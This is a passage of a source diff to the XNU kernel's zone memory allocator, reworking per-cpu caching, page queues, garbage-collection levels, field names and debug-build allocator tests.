/* Callout to buffer cache GC to drop elements in the apfs zones */ - if (consider_buffer_cache_collect != NULL) { - (void)(*consider_buffer_cache_collect)(0); + /* + * Now that we are initialized, we can enable zone caching for zones that + * were made before zcache_bootstrap() was called. + * + * The system is still single threaded so we don't need to take the lock. + */ + zone_index_foreach(i) { + zone_t z = &zone_array[i]; + if (z->z_pcpu_cache) { + z->z_pcpu_cache = NULL; + zone_enable_caching(z); + } } - consider_zone_gc(FALSE); -#endif /* DEBUG || DEVELOPMENT */ - return KERN_SUCCESS; } +STARTUP(ZALLOC, STARTUP_RANK_FOURTH, zone_cache_bootstrap); -zone_t -zone_find_largest(void) +void +zalloc_first_proc_made(void) { - uint32_t largest_idx = 0; - vm_offset_t largest_size = zone_size_wired(&zone_array[0]); + zone_caching_disabled = 0; +} - zone_index_foreach(i) { - vm_offset_t size = zone_size_wired(&zone_array[i]); - if (size > largest_size) { - largest_idx = i; - largest_size = size; - } +__startup_func +vm_offset_t +zone_foreign_mem_init(vm_size_t size) +{ + vm_offset_t mem; + + if (atop(size) > ZONE_FOREIGN_META_INLINE_COUNT) { + panic("ZONE_FOREIGN_META_INLINE_COUNT has become too small: " + "%d > %d", (int)atop(size), ZONE_FOREIGN_META_INLINE_COUNT); } - return &zone_array[largest_idx]; + mem = (vm_offset_t)pmap_steal_memory(size); + + zone_info.zi_meta_base = zone_foreign_meta_array_startup - + zone_pva_from_addr(mem).packed_address; + zone_info.zi_map_range[ZONE_ADDR_FOREIGN].min_address = mem; + zone_info.zi_map_range[ZONE_ADDR_FOREIGN].max_address = mem + size; + + zone_info.zi_bits_range = (struct zone_map_range){ + .min_address = (vm_offset_t)zba_chunk_startup, + .max_address = (vm_offset_t)zba_chunk_startup + + sizeof(zba_chunk_startup), + }; + zba_init_chunk(0); + + return mem; } +#endif /* !ZALLOC_TEST */ #pragma mark - tests #if DEBUG || DEVELOPMENT @@ -6150,37 +8577,42 @@ zone_find_largest(void) * a second zinit() comes through before 
zdestroy()), which could lead us to * run out of zones. */ -SIMPLE_LOCK_DECLARE(zone_test_lock, 0); +static SIMPLE_LOCK_DECLARE(zone_test_lock, 0); static boolean_t zone_test_running = FALSE; static zone_t test_zone_ptr = NULL; static uintptr_t * -zone_copy_allocations(zone_t z, uintptr_t *elems, bitmap_t *bits, - zone_pva_t page_index, zone_addr_kind_t kind) +zone_copy_allocations(zone_t z, uintptr_t *elems, zone_pva_t page_index) { - vm_offset_t free, first, end, page; + vm_offset_t elem_size = zone_elem_size(z); + vm_offset_t base; struct zone_page_metadata *meta; while (!zone_pva_is_null(page_index)) { - page = zone_pva_to_addr(page_index); - meta = zone_pva_to_meta(page_index, kind); - end = page + ptoa(meta->zm_percpu ? 1 : meta->zm_page_count); - first = page + ZONE_PAGE_FIRST_OFFSET(kind); + base = zone_pva_to_addr(page_index); + meta = zone_pva_to_meta(page_index); - bitmap_clear(bits, (uint32_t)((end - first) / zone_elem_size(z))); + if (meta->zm_inline_bitmap) { + for (size_t i = 0; i < meta->zm_chunk_len; i++) { + uint32_t map = meta[i].zm_bitmap; - // construct bitmap of all freed elements - free = zone_page_meta_get_freelist(z, meta, page); - while (free) { - bitmap_set(bits, (uint32_t)((free - first) / zone_elem_size(z))); - - // next free element - free = *(vm_offset_t *)free ^ zp_nopoison_cookie; - } - - for (unsigned i = 0; first < end; i++, first += zone_elem_size(z)) { - if (!bitmap_test(bits, i)) { - *elems++ = INSTANCE_PUT(first); + for (; map; map &= map - 1) { + *elems++ = INSTANCE_PUT(base + + elem_size * __builtin_clz(map)); + } + base += elem_size * 32; + } + } else { + uint32_t order = zba_bits_ref_order(meta->zm_bitmap); + bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap); + for (size_t i = 0; i < (1u << order); i++) { + uint64_t map = bits[i]; + + for (; map; map &= map - 1) { + *elems++ = INSTANCE_PUT(base + + elem_size * __builtin_clzll(map)); + } + base += elem_size * 64; } } @@ -6200,13 +8632,12 @@ zone_leaks(const char * 
zoneName, uint32_t nameLen, leak_site_proc proc, void * uint32_t idx, count, found; uint32_t btidx, btcount, nobtcount, btfound; uint32_t elemSize; - uint64_t maxElems; + size_t maxElems; kern_return_t kr; - bitmap_t *bits; - zone_index_foreach(i) { - if (!strncmp(zoneName, zone_array[i].z_name, nameLen)) { - zone = &zone_array[i]; + zone_foreach(z) { + if (!strncmp(zoneName, z->z_name, nameLen)) { + zone = z; break; } } @@ -6214,40 +8645,30 @@ zone_leaks(const char * zoneName, uint32_t nameLen, leak_site_proc proc, void * return KERN_INVALID_NAME; } - elemSize = zone_elem_size(zone); - maxElems = (zone->countavail + 1) & ~1ul; + elemSize = (uint32_t)zone_elem_size(zone); + maxElems = (zone->z_elems_avail + 1) & ~1ul; - if ((ptoa(zone->percpu ? 1 : zone->alloc_pages) % elemSize) && + if ((ptoa(zone->z_percpu ? 1 : zone->z_chunk_pages) % elemSize) && !zone_leaks_scan_enable) { return KERN_INVALID_CAPABILITY; } kr = kmem_alloc_kobject(kernel_map, (vm_offset_t *) &array, - maxElems * sizeof(uintptr_t) + BITMAP_LEN(ZONE_CHUNK_MAXELEMENTS), - VM_KERN_MEMORY_DIAG); + maxElems * sizeof(uintptr_t), VM_KERN_MEMORY_DIAG); if (KERN_SUCCESS != kr) { return kr; } - /* maxElems is a 2-multiple so we're always aligned */ - bits = CAST_DOWN_EXPLICIT(bitmap_t *, array + maxElems); - - lock_zone(zone); + zone_lock(zone); next = array; - next = zone_copy_allocations(zone, next, bits, - zone->pages_any_free_foreign, ZONE_ADDR_FOREIGN); - next = zone_copy_allocations(zone, next, bits, - zone->pages_all_used_foreign, ZONE_ADDR_FOREIGN); - next = zone_copy_allocations(zone, next, bits, - zone->pages_intermediate, ZONE_ADDR_NATIVE); - next = zone_copy_allocations(zone, next, bits, - zone->pages_all_used, ZONE_ADDR_NATIVE); + next = zone_copy_allocations(zone, next, zone->z_pageq_partial); + next = zone_copy_allocations(zone, next, zone->z_pageq_full); count = (uint32_t)(next - array); - unlock_zone(zone); + zone_unlock(zone); - zone_leaks_scan(array, count, zone_elem_size(zone), &found); 
+ zone_leaks_scan(array, count, (uint32_t)zone_elem_size(zone), &found); assert(found <= count); for (idx = 0; idx < count; idx++) { @@ -6310,6 +8731,8 @@ run_zone_test(void) unsigned int i = 0, max_iter = 5; void * test_ptr; zone_t test_zone; + zone_t test_pcpu_zone; + kern_return_t kr; simple_lock(&zone_test_lock, &zone_locks_grp); if (!zone_test_running) { @@ -6332,9 +8755,9 @@ run_zone_test(void) } #if KASAN_ZALLOC - if (test_zone_ptr == NULL && test_zone->countfree != 0) { + if (test_zone_ptr == NULL && test_zone->z_elems_free != 0) { #else - if (test_zone->countfree != 0) { + if (test_zone->z_elems_free != 0) { #endif printf("run_zone_test: free count is not zero\n"); return FALSE; @@ -6367,15 +8790,16 @@ run_zone_test(void) int idx, num_allocs = 8; vm_size_t elem_size = 2 * PAGE_SIZE / num_allocs; void *allocs[num_allocs]; - vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_count, relaxed); - vm_size_t zone_map_size = zone_range_size(&zone_info.zi_map_range); + void **allocs_pcpu; + vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed); test_zone = zone_create("test_zone_sysctl", elem_size, ZC_DESTRUCTIBLE | ZC_SEQUESTER); - if (test_zone == NULL) { - printf("run_zone_test: zinit() failed\n"); - return FALSE; - } + assert(test_zone); + + test_pcpu_zone = zone_create("test_zone_sysctl.pcpu", sizeof(uint64_t), + ZC_DESTRUCTIBLE | ZC_SEQUESTER | ZC_PERCPU); + assert(test_pcpu_zone); for (idx = 0; idx < num_allocs; idx++) { allocs[idx] = zalloc(test_zone); @@ -6385,63 +8809,105 @@ run_zone_test(void) for (idx = 0; idx < num_allocs; idx++) { zfree(test_zone, allocs[idx]); } - assert(!zone_pva_is_null(test_zone->pages_all_free)); + assert(!zone_pva_is_null(test_zone->z_pageq_empty)); + + kr = kernel_memory_allocate(kernel_map, + (vm_address_t *)&allocs_pcpu, PAGE_SIZE, + 0, KMA_ZERO | KMA_KOBJECT, VM_KERN_MEMORY_DIAG); + assert(kr == KERN_SUCCESS); + + for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) { + allocs_pcpu[idx] = 
zalloc_percpu(test_pcpu_zone, + Z_WAITOK | Z_ZERO); + assert(NULL != allocs_pcpu[idx]); + } + for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) { + zfree_percpu(test_pcpu_zone, allocs_pcpu[idx]); + } + assert(!zone_pva_is_null(test_pcpu_zone->z_pageq_empty)); - printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %qd%%\n", + printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %ld%%\n", vm_page_wire_count, vm_page_free_count, - (100ULL * ptoa_64(phys_pages)) / zone_map_size); - zone_gc(FALSE); - printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %qd%%\n", + 100L * phys_pages / zone_phys_mapped_max_pages); + zone_gc(ZONE_GC_DRAIN); + printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %ld%%\n", vm_page_wire_count, vm_page_free_count, - (100ULL * ptoa_64(phys_pages)) / zone_map_size); + 100L * phys_pages / zone_phys_mapped_max_pages); + unsigned int allva = 0; - zone_index_foreach(zidx) { - zone_t z = &zone_array[zidx]; - lock_zone(z); - allva += z->page_count; - if (!z->sequester_page_count) { - unlock_zone(z); + + zone_foreach(z) { + zone_lock(z); + allva += z->z_wired_cur; + if (zone_pva_is_null(z->z_pageq_va)) { + zone_unlock(z); continue; } unsigned count = 0; uint64_t size; - zone_pva_t pg = z->pages_sequester; + zone_pva_t pg = z->z_pageq_va; struct zone_page_metadata *page_meta; while (pg.packed_address) { - page_meta = zone_pva_to_meta(pg, ZONE_ADDR_NATIVE); - count += z->alloc_pages; + page_meta = zone_pva_to_meta(pg); + count += z->z_percpu ? 
1 : z->z_chunk_pages; + if (page_meta->zm_chunk_len == ZM_SECONDARY_PAGE) { + count -= page_meta->zm_page_index; + } pg = page_meta->zm_page_next; } - assert(count == z->sequester_page_count); + assert(z->z_wired_cur + count == z->z_va_cur); size = zone_size_wired(z); if (!size) { size = 1; } printf("%s%s: seq %d, res %d, %qd %%\n", - zone_heap_name(z), z->z_name, z->sequester_page_count, - z->page_count, zone_size_allocated(z) * 100ULL / size); - unlock_zone(z); + zone_heap_name(z), z->z_name, z->z_va_cur - z->z_wired_cur, + z->z_wired_cur, zone_size_allocated(z) * 100ULL / size); + zone_unlock(z); } printf("total va: %d\n", allva); - assert(zone_pva_is_null(test_zone->pages_all_free)); - assert(!zone_pva_is_null(test_zone->pages_sequester)); - assert(2 == test_zone->sequester_page_count); + assert(zone_pva_is_null(test_zone->z_pageq_empty)); + assert(zone_pva_is_null(test_zone->z_pageq_partial)); + assert(!zone_pva_is_null(test_zone->z_pageq_va)); + assert(zone_pva_is_null(test_pcpu_zone->z_pageq_empty)); + assert(zone_pva_is_null(test_pcpu_zone->z_pageq_partial)); + assert(!zone_pva_is_null(test_pcpu_zone->z_pageq_va)); + for (idx = 0; idx < num_allocs; idx++) { assert(0 == pmap_find_phys(kernel_pmap, (addr64_t)(uintptr_t) allocs[idx])); } + + /* make sure the zone is still usable after a GC */ + for (idx = 0; idx < num_allocs; idx++) { allocs[idx] = zalloc(test_zone); assert(allocs[idx]); printf("alloc[%d] %p\n", idx, allocs[idx]); } - assert(zone_pva_is_null(test_zone->pages_sequester)); - assert(0 == test_zone->sequester_page_count); + assert(zone_pva_is_null(test_zone->z_pageq_va)); + assert(test_zone->z_wired_cur == test_zone->z_va_cur); for (idx = 0; idx < num_allocs; idx++) { zfree(test_zone, allocs[idx]); } + + for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) { + allocs_pcpu[idx] = zalloc_percpu(test_pcpu_zone, + Z_WAITOK | Z_ZERO); + assert(NULL != allocs_pcpu[idx]); + } + for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) { + 
zfree_percpu(test_pcpu_zone, allocs_pcpu[idx]); + } + + assert(!zone_pva_is_null(test_pcpu_zone->z_pageq_empty)); + assert(zone_pva_is_null(test_pcpu_zone->z_pageq_va)); + + kmem_free(kernel_map, (vm_address_t)allocs_pcpu, PAGE_SIZE); + zdestroy(test_zone); + zdestroy(test_pcpu_zone); } else { printf("run_zone_test: skipping sequester test (not enabled)\n"); } @@ -6463,7 +8929,7 @@ run_zone_test(void) void zone_gc_replenish_test(void) { - zone_gc(FALSE); + zone_gc(ZONE_GC_DRAIN); } @@ -6478,8 +8944,7 @@ zone_alloc_replenish_test(void) */ zone_index_foreach(i) { z = &zone_array[i]; - if (z->prio_refill_count && - zone_elem_size(z) >= sizeof(struct data)) { + if (z->z_replenishes && zone_elem_size(z) >= sizeof(struct data)) { z = &zone_array[i]; break; } diff --git a/osfmk/kern/zalloc.h b/osfmk/kern/zalloc.h index 541de3bdd..0a6d7fb56 100644 --- a/osfmk/kern/zalloc.h +++ b/osfmk/kern/zalloc.h @@ -425,6 +425,15 @@ extern void *zalloc_permanent( #define zalloc_permanent_type(type_t) \ ((type_t *)zalloc_permanent(sizeof(type_t), ZALIGN(type_t))) +/*! + * @function zalloc_first_proc_made() + * + * @abstract + * Declare that the "early" allocation phase is done. + */ +extern void +zalloc_first_proc_made(void); + #pragma mark XNU only: per-cpu allocations /*! @@ -692,6 +701,7 @@ __enum_decl(zone_reserved_id_t, zone_id_t, { ZONE_ID_PROC, ZONE_ID_VM_MAP_COPY, ZONE_ID_PMAP, + ZONE_ID_VM_MAP, ZONE_ID__FIRST_DYNAMIC, }); @@ -727,6 +737,7 @@ const char *zone_heap_name( * @param zone the specified zone * @returns the zone (sub)map this zone allocates from. */ +__pure2 extern vm_map_t zone_submap( zone_t zone); @@ -813,6 +824,8 @@ extern zone_t zone_create_ext( * - isn't sensitive to @c zone_t::elem_size being compromised, * - is slightly faster as it saves one load and a multiplication. * + * @warning: zones using foreign memory can't use this interface. + * * @param zone_id the zone ID the address needs to belong to. * @param elem_size the size of elements for this zone. 
* @param addr the element address to check. @@ -822,30 +835,47 @@ extern void zone_id_require( vm_size_t elem_size, void *addr); +/*! + * @function zone_id_require_allow_foreign + * + * @abstract + * Requires for a given pointer to belong to the specified zone, by ID and size. + * + * @discussion + * This is a version of @c zone_id_require() that works with zones allowing + * foreign memory. + */ +extern void zone_id_require_allow_foreign( + zone_id_t zone_id, + vm_size_t elem_size, + void *addr); + /* * Zone submap indices * - * Z_SUBMAP_IDX_VA_RESTRICTED_MAP (LP64) + * Z_SUBMAP_IDX_VA_RESTRICTED (LP64) * used to restrict VM allocations lower in the kernel VA space, * for pointer packing * - * Z_SUBMAP_IDX_GENERAL_MAP + * Z_SUBMAP_IDX_VA_RESERVE (ILP32) + * used to keep a reserve of VA space for the urgent allocations + * backing allocations of crucial VM types (fictitious pages, holes, ...) + * + * Z_SUBMAP_IDX_GENERAL * used for unrestricted allocations * - * Z_SUBMAP_IDX_BAG_OF_BYTES_MAP + * Z_SUBMAP_IDX_BAG_OF_BYTES * used to sequester bags of bytes from all other allocations and allow VA reuse * within the map */ -#if !defined(__LP64__) -#define Z_SUBMAP_IDX_GENERAL_MAP 0 -#define Z_SUBMAP_IDX_BAG_OF_BYTES_MAP 1 -#define Z_SUBMAP_IDX_COUNT 2 +#if defined(__LP64__) +#define Z_SUBMAP_IDX_VA_RESTRICTED 0 #else -#define Z_SUBMAP_IDX_VA_RESTRICTED_MAP 0 -#define Z_SUBMAP_IDX_GENERAL_MAP 1 -#define Z_SUBMAP_IDX_BAG_OF_BYTES_MAP 2 -#define Z_SUBMAP_IDX_COUNT 3 +#define Z_SUBMAP_IDX_VA_RESERVE 0 #endif +#define Z_SUBMAP_IDX_GENERAL 1 +#define Z_SUBMAP_IDX_BAG_OF_BYTES 2 +#define Z_SUBMAP_IDX_COUNT 3 /* Change zone sub-map, to be called from the zone_create_ext() setup hook */ extern void zone_set_submap_idx( @@ -855,23 +885,30 @@ extern void zone_set_submap_idx( /* Make zone as non expandable, to be called from the zone_create_ext() setup hook */ extern void zone_set_noexpand( zone_t zone, - vm_size_t maxsize); + vm_size_t max_elements); /* Make zone exhaustible, to be 
called from the zone_create_ext() setup hook */ extern void zone_set_exhaustible( zone_t zone, - vm_size_t maxsize); + vm_size_t max_elements); -/* Initially fill zone with specified number of elements */ -extern int zfill( - zone_t zone, - int nelem); - -/* Fill zone with memory */ -extern void zcram( +/*! + * @function zone_fill_initially + * + * @brief + * Initially fill a non collectable zone to have the specified amount of + * elements. + * + * @discussion + * This function must be called on a non collectable permanent zone before it + * has been used yet. + * + * @param zone The zone to fill. + * @param nelems The number of elements to be able to hold. + */ +extern void zone_fill_initially( zone_t zone, - vm_offset_t newmem, - vm_size_t size); + vm_size_t nelems); #pragma mark XNU only: misc & implementation details @@ -940,6 +977,26 @@ extern void zone_view_startup_init( #define __zpcpu_cast(ptr, e) ((typeof(ptr))(e)) #define __zpcpu_next(ptr) __zpcpu_cast(ptr, __zpcpu_addr(ptr) + PAGE_SIZE) +/** + * @macro __zpcpu_mangle_for_boot() + * + * @discussion + * Per-cpu variables allocated in zones (as opposed to percpu globals) that need + * to function early during boot (before @c STARTUP_SUB_ZALLOC) might use static + * storage marked @c __startup_data and replace it with the proper allocation + * at the end of the @c STARTUP_SUB_ZALLOC phase (@c STARTUP_RANK_LAST). + * + * However, some devices boot from a cpu where @c cpu_number() != 0. This macro + * provides the proper mangling of the storage into a "fake" percpu pointer so + * that accesses through @c zpercpu_get() functions properly. + * + * This is invalid to use after the @c STARTUP_SUB_ZALLOC phase has completed. 
+ */ +#define __zpcpu_mangle_for_boot(ptr) ({ \ + assert(startup_phase < STARTUP_SUB_ZALLOC); \ + __zpcpu_cast(ptr, __zpcpu_mangle(__zpcpu_addr(ptr) - ptoa(cpu_number()))); \ +}) + extern unsigned zpercpu_count(void) __pure2; diff --git a/osfmk/kern/zalloc_internal.h b/osfmk/kern/zalloc_internal.h index 9fff60429..366ce538e 100644 --- a/osfmk/kern/zalloc_internal.h +++ b/osfmk/kern/zalloc_internal.h @@ -63,28 +63,15 @@ #include #include #include -#include #include +#include #if KASAN -#include #include -/* - * Set to 0 to debug poisoning and ZC_ZFREE_CLEARMEM validation under kasan. - * Otherwise they are double-duty with what kasan already does. - */ -#define ZALLOC_ENABLE_POISONING 0 -#else /* !KASAN */ -#define ZALLOC_ENABLE_POISONING 1 +#include #endif /* !KASAN */ -#if DEBUG || DEVELOPMENT -#define ZALLOC_DETAILED_STATS 1 -#else -#define ZALLOC_DETAILED_STATS 0 -#endif - /*! * @file * @@ -140,11 +127,12 @@ typedef struct zone_packed_virtual_address { struct zone_stats { uint64_t zs_mem_allocated; uint64_t zs_mem_freed; -#if ZALLOC_DETAILED_STATS - uint64_t zs_mem_wasted; -#endif /* ZALLOC_DETAILED_STATS */ + uint32_t zs_poison_seqno; /* counter for poisoning every N frees */ + uint32_t zs_alloc_rr; /* allocation rr bias */ }; +STAILQ_HEAD(zone_depot, zone_magazine); + struct zone { /* * Readonly / rarely written fields @@ -160,52 +148,47 @@ struct zone { zone_stats_t z_stats; const char *z_name; struct zone_view *z_views; -#ifdef CONFIG_ZCACHE - struct zone_cache zcache; -#endif /* CONFIG_ZCACHE */ - uint16_t alloc_pages; /* size used for more memory in pages */ - uint16_t z_elem_size; /* size of an element */ - uint16_t pcpu_elem_size; - uint16_t prio_refill_count; /* if !=0 , refill to this count */ - uint32_t page_count_max; /* how large can this zone grow */ + struct thread *z_expander; + struct zone_cache *__zpercpu z_pcpu_cache; - uint32_t page_count_hwm; /* page_count high watermark */ - uint32_t page_count; /* number of pages used by this zone */ - 
uint32_t countavail; /* Number of elements available */ + uint16_t z_chunk_pages; /* size used for more memory in pages */ + uint16_t z_chunk_elems; /* count of allocations per chunk */ + uint16_t z_elems_rsv; /* maintain a free reserve of elements */ + uint16_t z_elem_size; /* size of an element */ uint64_t /* * Lifecycle state (Mutable after creation) */ - destroyed :1, /* zone is (being) destroyed */ - expanding_no_vm_priv:1, /* zone expanding via a non-vm_privileged thread */ - expanding_vm_priv :1, /* zone expanding via a vm_privileged thread */ - async_pending :1, /* asynchronous allocation pending? */ - waiting :1, /* is thread waiting for expansion? */ - zone_replenishing :1, + z_destroyed :1, /* zone is (being) destroyed */ + z_async_refilling :1, /* asynchronous allocation pending? */ + z_replenish_wait :1, /* someone is waiting on the replenish thread */ + z_expanding_wait :1, /* is thread waiting for expansion? */ + z_expander_vm_priv :1, /* a vm privileged thread is expanding */ /* * Security sensitive configuration bits */ - allows_foreign :1, /* allow non-zalloc space */ - destructible :1, /* zone can be zdestroy()ed */ + z_allows_foreign :1, /* allow non-zalloc space */ + z_destructible :1, /* zone can be zdestroy()ed */ kalloc_heap :2, /* zone_kheap_id_t when part of a kalloc heap */ - noencrypt :1, /* do not encrypt pages when hibernating */ - submap_idx :2, /* a Z_SUBMAP_IDX_* value */ - va_sequester :1, /* page sequester: no VA reuse with other zones */ - zfree_clear_mem :1, /* clear memory of elements on free and assert on alloc */ + z_noencrypt :1, /* do not encrypt pages when hibernating */ + z_submap_idx :2, /* a Z_SUBMAP_IDX_* value */ + z_va_sequester :1, /* page sequester: no VA reuse with other zones */ + z_free_zeroes :1, /* clear memory of elements on free and assert on alloc */ /* * Behavior configuration bits */ + z_percpu :1, /* the zone is percpu */ + z_permanent :1, /* the zone allocations are permanent */ + z_replenishes :1, /* 
uses the async replenish mechanism for VM */ + z_nocaching :1, /* disallow zone caching for this zone */ collectable :1, /* garbage collect empty pages */ - cpu_cache_enabled :1, - permanent :1, /* the zone allocations are permanent */ exhaustible :1, /* merely return if empty? */ expandable :1, /* expand zone (with message)? */ no_callout :1, - percpu :1, /* the zone is percpu */ _reserved :26, @@ -227,7 +210,20 @@ struct zone { * often mutated fields */ - decl_simple_lock_data(, lock); + lck_spin_t z_lock; + struct zone_depot z_recirc; + + /* + * Page accounting (wired / VA) + * + * Those numbers are unscaled for z_percpu zones + * (zone_scale_for_percpu() needs to be used to find the true value). + */ + uint32_t z_wired_max; /* how large can this zone grow */ + uint32_t z_wired_hwm; /* z_wired_cur high watermark */ + uint32_t z_wired_cur; /* number of pages used by this zone */ + uint32_t z_wired_empty; /* pages collectable by GC */ + uint32_t z_va_cur; /* amount of VA used by this zone */ /* * list of metadata structs, which maintain per-page free element lists @@ -235,17 +231,48 @@ struct zone { * Note: Due to the index packing in page metadata, * these pointers can't be at the beginning of the zone struct. 
*/ - zone_pva_t pages_any_free_foreign; /* foreign pages crammed into zone */ - zone_pva_t pages_all_used_foreign; - zone_pva_t pages_all_free; - zone_pva_t pages_intermediate; - zone_pva_t pages_all_used; - zone_pva_t pages_sequester; /* sequestered pages - allocated VA with no populated pages */ - - uint32_t zp_count; /* counter for poisoning every N frees */ - uint32_t countfree; /* Number of free elements */ - uint32_t allfree_page_count; /* Number of pages collectable by GC */ - uint32_t sequester_page_count; + zone_pva_t z_pageq_empty; /* populated, completely empty pages */ + zone_pva_t z_pageq_partial;/* populated, partially filled pages */ + zone_pva_t z_pageq_full; /* populated, completely full pages */ + zone_pva_t z_pageq_va; /* non-populated VA pages */ + + /* + * Zone statistics + * + * z_contention_wma: + * weighted moving average of the number of contentions per second, + * in Z_CONTENTION_WMA_UNIT units (fixed point decimal). + * + * z_contention_cur: + * count of recorded contentions that will be fused in z_contention_wma + * at the next period. + * + * z_recirc_cur: + * number of magazines in the recirculation depot. + * + * z_elems_free: + * number of free elements in the zone. + * + * z_elems_free_{min,max}: + * tracks the low/high watermark of z_elems_free for the current + * weighted moving average period. + * + * z_elems_free_wss: + * weighted moving average of the (z_elems_free_max - z_elems_free_min) + * amplitude which is used by the GC for trim operations. + * + * z_elems_avail: + * number of elements in the zone (at all). 
+ */ +#define Z_CONTENTION_WMA_UNIT (1u << 8) + uint32_t z_contention_wma; + uint32_t z_contention_cur; + uint32_t z_recirc_cur; + uint32_t z_elems_free_max; + uint32_t z_elems_free_wss; + uint32_t z_elems_free_min; + uint32_t z_elems_free; /* Number of free elements */ + uint32_t z_elems_avail; /* Number of elements available */ #if CONFIG_ZLEAKS uint32_t zleak_capture; /* per-zone counter for capturing every N allocations */ @@ -254,7 +281,8 @@ struct zone { gzalloc_data_t gz; #endif #if KASAN_ZALLOC - vm_size_t kasan_redzone; + uint32_t z_kasan_redzone; + spl_t z_kasan_spl; #endif #if DEBUG || DEVELOPMENT || CONFIG_ZLEAKS /* zone logging structure to hold stacks and element references to those stacks. */ @@ -300,16 +328,33 @@ struct kheap_zones { }; extern zone_security_options_t zsecurity_options; -extern uint32_t _Atomic num_zones; +extern zone_id_t _Atomic num_zones; extern uint32_t zone_view_count; extern struct zone zone_array[]; -extern lck_grp_t zone_locks_grp; extern const char * const kalloc_heap_names[KHEAP_ID_COUNT]; +extern bool panic_include_zprint; +#if CONFIG_ZLEAKS +extern bool panic_include_ztrace; +extern struct ztrace *top_ztrace; +#endif +extern mach_memory_info_t *panic_kext_memory_info; +extern vm_size_t panic_kext_memory_size; +extern unsigned int zone_map_jetsam_limit; #define zone_index_foreach(i) \ - for (uint32_t i = 1, num_zones_##i = os_atomic_load(&num_zones, acquire); \ + for (zone_id_t i = 1, num_zones_##i = os_atomic_load(&num_zones, acquire); \ i < num_zones_##i; i++) +#define zone_foreach(z) \ + for (zone_t z = &zone_array[1], \ + last_zone_##z = &zone_array[os_atomic_load(&num_zones, acquire)]; \ + z < last_zone_##z; z++) + +struct zone_map_range { + vm_offset_t min_address; + vm_offset_t max_address; +} __attribute__((aligned(2 * sizeof(vm_offset_t)))); + __pure2 static inline vm_offset_t zone_elem_size(zone_t zone) @@ -320,7 +365,16 @@ zone_elem_size(zone_t zone) static inline uint32_t zone_count_allocated(zone_t zone) { - 
return zone->countavail - zone->countfree; + return zone->z_elems_avail - zone->z_elems_free; +} + +static inline vm_size_t +zone_scale_for_percpu(zone_t zone, vm_size_t size) +{ + if (zone->z_percpu) { + size *= zpercpu_count(); + } + return size; } static inline vm_size_t @@ -330,26 +384,29 @@ zone_size_wired(zone_t zone) * this either require the zone lock, * or to be used for statistics purposes only. */ - return ptoa(os_atomic_load(&zone->page_count, relaxed)); + vm_size_t size = ptoa(os_atomic_load(&zone->z_wired_cur, relaxed)); + return zone_scale_for_percpu(zone, size); } static inline vm_size_t zone_size_free(zone_t zone) { - return (vm_size_t)zone->pcpu_elem_size * zone->countfree; + return zone_scale_for_percpu(zone, + (vm_size_t)zone->z_elem_size * zone->z_elems_free); } static inline vm_size_t zone_size_allocated(zone_t zone) { - return (vm_size_t)zone->pcpu_elem_size * zone_count_allocated(zone); + return zone_scale_for_percpu(zone, + (vm_size_t)zone->z_elem_size * zone_count_allocated(zone)); } static inline vm_size_t zone_size_wasted(zone_t zone) { - return zone_size_wired(zone) - - (vm_size_t)zone->pcpu_elem_size * zone->countavail; + return zone_size_wired(zone) - zone_scale_for_percpu(zone, + (vm_size_t)zone->z_elem_size * zone->z_elems_avail); } /* @@ -359,15 +416,61 @@ zone_size_wasted(zone_t zone) */ extern uint64_t get_zones_collectable_bytes(void); -/* - * zone_gc also checks if the zone maps are getting close to full and triggers - * jetsams if needed, provided consider_jetsams is set to TRUE. +/*! + * @enum zone_gc_level_t + * + * @const ZONE_GC_TRIM + * Request a trimming GC: it will trim allocations in excess + * of the working set size estimate only. + * + * @const ZONE_GC_DRAIN + * Request a draining GC: this is an aggressive mode that will + * cause all caches to be drained and all free pages returned to the system. 
+ * + * @const ZONE_GC_JETSAM + * Request to consider a jetsam, and then fall back to @c ZONE_GC_TRIM or + * @c ZONE_GC_DRAIN depending on the state of the zone map. + * To avoid deadlocks, only @c vm_pageout_garbage_collect() should ever + * request a @c ZONE_GC_JETSAM level. + */ +__enum_closed_decl(zone_gc_level_t, uint32_t, { + ZONE_GC_TRIM, + ZONE_GC_DRAIN, + ZONE_GC_JETSAM, +}); + +/*! + * @function zone_gc + * + * @brief + * Reduces memory used by zones by trimming caches and freelists. * - * To avoid deadlocks, we only pass a value of TRUE from within the - * vm_pageout_garbage_collect thread. + * @discussion + * @c zone_gc() is called: + * - by the pageout daemon when the system needs more free pages. + * - by the VM when contiguous page allocation requests get stuck + * (see vm_page_find_contiguous()). + * + * @param level The zone GC level requested. + */ +extern void zone_gc(zone_gc_level_t level); + +extern void zone_gc_trim(void); +extern void zone_gc_drain(void); + +#define ZONE_WSS_UPDATE_PERIOD 10 +/*! + * @function compute_zone_working_set_size + * + * @brief + * Recomputes the working set size for every zone + * + * @discussion + * This runs about every @c ZONE_WSS_UPDATE_PERIOD seconds (10), + * computing an exponential moving average with a weight of 75%, + * so that the history of the last minute is the dominating factor. */ -extern void zone_gc(boolean_t consider_jetsams); -extern void consider_zone_gc(boolean_t consider_jetsams); +extern void compute_zone_working_set_size(void *); /* Debug logging for zone-map-exhaustion jetsams. */ extern void get_zone_map_size(uint64_t *current_size, uint64_t *capacity); @@ -376,17 +479,25 @@ extern void get_largest_zone_info(char *zone_name, size_t zone_name_len, uin /* Bootstrap zone module (create zone zone) */ extern void zone_bootstrap(void); -/* +/*! 
